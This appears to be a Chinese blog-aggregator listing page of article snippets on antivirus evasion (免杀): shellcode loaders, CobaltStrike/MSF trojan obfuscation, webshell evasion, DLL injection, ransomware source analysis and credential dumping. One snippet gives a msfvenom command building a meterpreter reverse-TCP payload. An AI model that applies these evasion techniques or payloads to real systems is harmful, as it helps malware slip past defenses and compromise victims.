免杀_花指令

APT之木马静态免杀

前言这篇文章主要是记录手动编写代码进行木马免杀,使用工具也可以免杀,只不过太脚本小子了,而且工具的特征也容易被杀软抓到,指不定哪天就用不了了,所以要学一下手动去免杀木马,也方便以后开发一个只属于自己的木马关于使用工具免杀的教程
Ba1_Ma0·2023-03-31 04:57

免杀前置课——shellcode】二十一、shellcode初步优化——通过跳板指令定位shellcode,解决程序随机基址无法跳转shellcode问题(详解)

shellcode初步优化通过跳板指令定位shellcode极其简化版shellcode_存在问题:```解析(重要)```第一个问题程序随机基址无法确定跳转shellcode位置第二个问题程序未正常退出通过跳板指令定位shellcode极其简化版shellcode_存在问题:1、利用x32dbg_工具查找的栈中shellcode起始地址,用该地址淹没返回地址,这个地址会经常发生变化,须找到一个能
webfker from 0 to 1·2023-03-31 03:15

MSF实战免杀过静态:ShellCode加花指令

分析MSF的ShellCode1.Hash寻找系统API函数由于ShellCode是没有PE结构的,无法通过导入表来调用系统的API函数,因此,这部分是一个通用的API调用函数,它可以根据给定的哈希值查找并调用相应的API。在查找API时,它会遍历已加载模块的列表以及每个模块的导出地址表。这个函数在Shellcode中非常重要,因为它可以让我们不用硬编码API函数地址,而是动态地查找和调用它们。;
Henry404s·2023-03-31 03:22

APT级全面免杀与企业纵深防御体系的红蓝对抗

一、CobaltStrike快速入门CobaltStrike:C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。CobaltStrike整体功能了解参考MITREATT&CK™CobaltStrike的C/S架构客户端(ClientGUI)团队成员使用的图形化界面服务器(TeamServer)控制-TeamServer是CobaltStrike中所有payloa
wespten·2023-03-29 11:46

【总结】防病毒网关---防毒墙

恶意代码的免杀技术免杀原理文件免杀原理改特征码免杀原理花指令免杀原理加壳免杀原理内存免杀原理行为免杀原理反病毒技术单机反病毒杀毒软件网关反病毒反病毒工作原理首包检
Born to be·2023-03-27 09:52

结合veillCS shellcode免杀(2020.1.13已过期)

dockerrun-it-v/tmp/veil-output:/var/lib/veil/output:Zmattiasohlsson/veil生成的exe文件在/tmp/veil-output,之后在这取三、veil免杀
q1ya·2023-03-26 09:26

MSF--Powershell木马免杀测试过36*和火*

之前看了一篇对CS的Powershell木马进行Base64编码达到免杀效果,今天随便测试了一下MSF的Powershell木马免杀,两者虽然有些不同,但是方法还是大同小异的,Base64编码+修改变量名
LMcream·2023-03-25 16:45

萧何自污:大智若愚免杀身之祸

背景故事:萧何对刘邦的拥护之恩秦二世元年(公元前209年)七月,陈胜、吴广在大泽乡揭竿而起,举起了反秦的大旗,各地豪杰云集响应,天下大乱。而此时的萧何仍在沛县当功曹,他和曹参、樊哙、夏侯婴、周勃等人时常聚会,密切注视着局势的发展,并暗中与在芒砀山中的刘邦保持着联系。萧何萧何召集沛城父老共商大计。大家都推举刘邦为县令,背秦自立。刘邦却推辞道:“现今天下纷扰,诸侯并起,沛令一席自应选择全县最有声望之人
道不完的你·2023-03-20 23:02

免杀工具shellcodeloader

工具地址:shellcodeloader不想自己编译,就用工具作者自己编译的成品,realseMSF生成bin文件:msfvenom-pwindows/x64/meterpreter_reverse_tcpLHOST=IPLPORT=port-fraw-o1.bin将生成好的木马1.bin拖入shellcodeloader中,并勾选所需配置,配置的选择原项目中介绍的很清楚,这里就不过多赘述了,点击
LMcream·2023-03-17 05:19

CobaltStrike二次开发环境准备以及免杀

文章目录前言一、环境二、过程1.注册Idea2.原版CobaltStrike3.开始反编译4.新建项目5.配置项目6.去除暗桩7.免杀CobaltStrike免杀其他免杀profilefile重写Stager
QQQqQqqqqrrrr·2023-03-12 12:27

NO_ACCESS Protection

NO_ACCESSProtection前言基本思路参考项目:前言这是原本开始是一位朋友研究后发现的一种对抗游戏外挂的思路,我看了一下发现其实可以扩散一下思路用于免杀对抗,说不定有意想不到的效果。
QQQqQqqqqrrrr·2023-03-12 12:27

Webshell_Generate 工具

且都已做了简单的免杀处理。免杀说明:jsp、jspx:争取将代码最
CSeroad·2023-02-07 04:39

Python免杀CS/MSF木马过36*和火*

今天测试了下Python免杀CS/MSF中Python格式的shellcode主要是巧用HEX编码即可,同之前的Base64编码免杀,不编译成EXE可过Defender。
LMcream·2023-02-03 10:46

msf生成免杀木马

一.杀软原理免杀概念免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写VirusAV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术
夜yesir·2023-02-03 00:53

MSF后门生成及免杀思想

MSF后门生成及免杀思想免杀概念杀毒软件检测方式杀毒软件主动防御免杀技术介绍修改特征码花指令免杀内存免杀加壳免杀二次编译资源修改MSF常用命令常见的木马生成常见后门生成方式编译软件VC++6.0免杀MSF
安澈521·2023-02-03 00:53

WebShell免杀之JSP ——yzddMr6

原文地址:https://yzddmr6.tk/posts/webshell-bypass-jsp/本文已授权悬剑武器库转载前言其他类型的webshell容易免杀的一个主要原因是有eval函数,能够把我们的加密几层后的
yzddMr6·2023-02-03 00:48

技术分享 | go语言源码免杀MSF木马

木马源码免杀两种形式:下载者和加载者https://www.freebuf.com/articles/system/227468.html前言加载者的免杀分为两部分:加载器本身的免杀,加载器源码因为在网上发布许久
天磊卫士官方·2023-01-10 18:21

免杀前置课——Windows编程】十二、线程同步——一文讲懂什么是线程同步、原子操作函数、临界区、互斥体(激发态与非激发态区别)

线程同步线程同步多线程运行同一操作对象问题解决方案A:原子操作函数解决方案B:临界区解决方案C:互斥体激发态与非激发态互斥体优点:线程同步多线程运行同一操作对象问题#include#includeLONGg_count=0;DWORDWINAPImyThreadProc1(_In_LPVOIDlpParameter){for(size_ti=0;i<100000;i++){g_count++;}r
webfker from 0 to 1·2023-01-08 18:51

我的powershell免杀之路

我的powershell免杀之路原创tubai[花指令安全实验室](javascript:void(0)2021-07-0620:39WindowsPowerShell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用
明月清风~~·2023-01-02 18:48

恶意软件免杀与技术(2022.04.25)

BlackGuard加密货币钱包窃取规避以下dll的加载SbieDll.dll沙盒沙盒SxIn.dll360全方位安全Sf2.dllAvast杀毒软件snxhk.dllAvast杀毒软件cmdvrt32.dllCOMODO网络安全使用Obfuscar进行.NET程序混淆BlackGuard还将查询“IP-Whois”以确定受害者的大致位置。在BlackGuard的一些样本中,此功能用于防止恶意软件
摔不死的笨鸟·2022-12-21 23:33

Conti勒索软件源代码分析

Conti勒索参数静态免杀反调试反HOOK字符串混淆指令混淆线程池加密算法加密性能重启系统安全模式加密参考链接参数Conti勒索软件v3版本的参数调用如下:参数功能-p指定加密路径-mLocalallnetbackups
摔不死的笨鸟·2022-12-21 23:33

一篇学会脱壳——06.exe脱壳

花指令混淆,IAT加密和反调试,是一个很好的教学练习壳,这里详细写下脱壳步骤。
摔不死的笨鸟·2022-12-21 23:03

内网渗透Windows密码凭证获取

记录一下抓取window凭证信息的一些工具Windows凭证抓取1,procdump(官方工具无视免杀)(首选)procdump+mimikatz加载dmp文件,并导出其中的明文密码(procdump过杀软
西湖第一剑·2022-12-21 08:16

Metasploit实现木马生成、捆绑及免杀

木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。
·2022-12-19 11:57

软件安全-UPX加壳

从而达到防修改与防反编译的效果,而因为源代码在磁盘中以压缩形式存储,虽然脱壳操作加重了CPU的负担,但减少了磁盘的读写,所以在大多数情况下还能提高程序运行速度;这种技术也常被应用到病毒免杀中,给病毒加壳后
写代码的小阿帆·2022-12-16 02:10

逆向-加壳工具介绍

经过两周尝试手动编写加壳程序,目前也只是能实现给PE文件添加新区块,后面还有重定位表的修复,地址输入表的处理,虚拟机和花指令技术等反调试手段…一大串要学习的工作,几乎就是放弃了吧,通过这两周学习能让自己对
写代码的小阿帆·2022-12-16 02:10

[免杀]基于python的uuid加载器

文章目录uuid字节转换uuid申请内存写入内存创建进程代码uuidUUID:通用唯一标识符(UniversallyUniqueIdentifier),对于所有的UUID它可以保证在空间和时间上的唯一性.它是通过MAC地址,时间戳,命名空间,随机数,伪随机数来保证生成ID的唯一性,有着固定的大小(128bit).它的唯一性和一致性特点使得可以无需注册过程就能够产生一个新的UUID.UUID可以被用
3tefanie丶zhou·2022-12-10 07:03

[免杀]基于python的ipv4加载器

文章目录IPV4将shellcode字节转为Ipv4格式将Ipv4写入内存创建进程IPV4IPv4是一种无连接的协议,操作在使用分组交换的链路层(如以太网)上。此协议会尽最大努力交付数据包,意即它不保证任何数据包均能送达目的地,也不保证所有数据包均按照正确的顺序无重复地到达。IPv4使用32位(4字节)地址,因此地址空间中只有4,294,967,296个地址,格式如下:格式值从点分十进制转换点分十
3tefanie丶zhou·2022-12-10 07:03

网安基础词汇

(sniffer):恶意软件:间谍软件:后门:弱口令:漏洞:远程命令执行漏洞:0day漏洞:1day漏洞:Nday漏洞:攻击方法挂马:挖洞:加壳:溢出:缓冲区溢出:注入:SQL注入:注入点:软件脱壳:免杀
黑弥勒+·2022-12-07 10:05

【网络安全】红队攻防之基础免杀

引言本文主要介绍“反射型dll注入”及“柔性加载”技术。反射型dll注入为什么需要反射型dll注入常规的dll注入代码如下:intmain(intargc,char*argv[]){HANDLEprocessHandle;PVOIDremoteBuffer;wchar_tdllPath[]=TEXT("C:\\experiments\\evilm64.dll");printf("Injecting
kali_Ma·2022-12-06 20:29

Windows下免杀思路总结

1.简介在安全厂商日趋成熟的背景下,编写免杀马的难度和成本日益增长。好用新兴的开源项目在短时间内就被分析并加入特征库。
小黑安全·2022-12-06 02:09

【网安神器篇】——LaZagne凭证收集工具

摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷座右铭:不要让时代的悲哀成为你的悲哀专研方向:网络安全,数据结构每日emo:连问候都害怕是打扰目录一、LaZagne介绍二、功能三、跨平台性四、免杀
Demo不是emo·2022-12-04 10:22

vulntarget-b靶场详细通关记录

vulntarget-b靶场详细通关记录前言这个靶场打了好几天才打下来,在上线msf和免杀过火绒还有psexec横向移动中卡了很久。
tpaer·2022-11-24 11:17

免杀实战之面向PHP的WebShell免杀

0X00普通的一句话木马//函数的相似替换与第一个一句话木马相比多了一个"@“字符,我们发现这个字符的含义是在php语法中表示抑制错误信息即使有错误也不返回;属于不太重要的"组件”,而且它的写入位置也相对灵活;可以是eval函数前面,也可以是post函数前面…接着我们看第二个代码,我们发现它把eval函数替换为了assert函数;这时我们通过查看PHP手册发现如下区别:eval():函数把字符串当
kali_Ma·2022-10-21 07:39

[系统安全]《黑客免杀攻防》MFC逆向基础实战

本文为笔者从零基础学习系统安全相关内容的笔记,如果您对系统安全、逆向分析等内容感兴趣或者想要了解一些内容,欢迎关注。本系列文章将会随着笔者在未来三年的读研过程中持续更新,由于笔者现阶段还处于初学阶段,不可避免参照复现各类书籍内容,如书籍作者认为侵权请告知,笔者将立刻删除。强调本系列所有内容仅作为学习研究使用,作者对此文章中的代码造成的任何后果不负法律责任。前文链接[系统安全]PE文件格式详解1[系
H4ppyD0g·2022-10-14 22:12

[系统安全]《黑客免杀攻防》逆向基础之经典脱壳基础

本文为笔者从零基础学习系统安全相关内容的笔记,如果您对系统安全、逆向分析等内容感兴趣或者想要了解一些内容,欢迎关注。本系列文章将会随着笔者在未来三年的读研过程中持续更新,由于笔者现阶段还处于初学阶段,不可避免参照复现各类书籍内容,如书籍作者认为侵权请告知,笔者将立刻删除。强调本系列所有内容仅作为学习研究使用,作者对此文章中的代码造成的任何后果不负法律责任。前文链接[系统安全]PE文件格式详解1[系
H4ppyD0g·2022-10-14 22:12

[渗透测试笔记] 52.告别初级,日薪2k的蓝队hw中级定级必备笔记

文章目录权限维持横向移动内网渗透域渗透溯源CS和msf联动提权工具免杀webshell管理工具常用windows命令DMZvenom和proxchains代理流程应急响应web日志Apache日志Tomcat
H4ppyD0g·2022-10-14 22:12

【网络安全】渗透测试之木马免杀

博主座右铭:发现光,追随光,成为光,散发光;博主研究方向:渗透测试、机器学习;博主寄语:感谢各位技术友的支持,您的支持就是我前进的动力;目录一、免杀概念1.什么是免杀2.杀软的查杀方法(1)
跳楼梯企鹅·2022-10-04 20:31

安全专业词汇(部分)

安全专业词汇(部分)footprinting踩点Dos拒绝服务攻击DDos分布式拒绝服务攻击RAT远程管理工具FUD免杀Rootkit嵌入到进程中,隐藏起来的服务Fishing钓鱼sqlinjectionsql
ZHFTT917·2022-10-04 12:10

渗透测试(一)-Msf生成免杀后门(内网篇)

实验环境:攻击机:kalilinux-2021.1(192.168.56.128)靶机:Windows10(192.168.1.120)推荐两个免费在线木马检测网站:VirusScan和VirusTotal原理图:1.Meterpreter简介Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道,使用它作
国民老公阿航·2022-09-29 08:53

安全防御(四)--- 恶意软件及其特征、分类、免杀技术,反病毒技术,反病毒网关工作过程及其配置

四、恶意软件的免杀技术有哪些?五、反病毒技术有哪些?六、反病毒网关的工作原理是什么?七、反病毒网关的工作过程是什么?
爱喝咖啡的果子·2022-09-15 10:06

红队社工之BadUSB

文章目录什么是BadUSBBadUSB攻击方式制作BadUSB作用目标机器默认中文输入法解决方法cs免杀马键盘操作流程编译烧录防御措施什么是BadUSBBadUSB最早是在2014年的黑帽大会上研究人员
sec0nd_·2022-09-11 11:04

Bypass Windows Defender Dump Lsass(手法拙劣)

操作系统的杀毒软件程序,本文旨在记录实战环境中,服务器存在WindowsDefender情况下转储凭证的渗透手法,技术简单粗糙,但是有效,各位轻喷,抱拳.jpg0x01.前提条件能够落地DumpLsass的免杀程序
zha0gongz1·2022-09-07 14:00

木马免杀

最近学了点木马免杀,其实总结起来一共有三个层面,代码面,文件面,逻辑面。
Ray言午·2022-09-01 19:00

MSF(2)——各种木马的生成及简单的免杀

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记文章目录前文链接木马生成免杀php免杀Python免杀分析木马文件编写免杀马打包exe前文链接WAMP/DVWA/sqli-labs搭建burpsuite
漫路在线·2022-08-31 07:33

安全攻防实战系列MSF

前言在红队攻防中,我们主要在外网进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobaltstrike或msf等c2服务器,之后对内网进行信息收集并绘制网络拓扑图
普通网友·2022-08-22 17:37

一个免杀项目分享

这个本来是为某大型活动准备的,经过实战测试,效果还行,实战中即使用户电脑存在杀软进程,cs也能稳定上线。现在活动结束,平时基本也用不上了,所以分享出来以供技术交流(本着能用就行的原则没来得及重构,项目结构有点乱)
9eek·2022-08-18 17:00

网络攻防——kali操作系统基本使用

2.环境安装生成木马主要需要如下工具:kali操作系统,VMware15(搭建kali操作系统环境,防止影响自己的windows系统的正常运行),Themida(免杀加壳工具,防止被电脑或者手机的安全工具查杀
普通网友·2022-08-03 11:53

一句话木马

入侵条件(1)木马上传成功,未被杀(木马免杀);(2)知道木马在网站存储的路径在哪;(3)上传的木马能正常运行。代码
weixin_47836220·2022-07-27 11:30

免杀工具BypassAv-web使用教程

0x01介绍nim一键木马免杀项目,目前能完美过360、火绒等杀软。作者使用纯nim语言编写的shellcode记载器,代码基本是从之前c++版本平移过来,作者并没有提供部署教程,踩坑记录下。
kracer127·2022-07-27 11:04
上一页 4 5 6 7 8 9 10 11 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他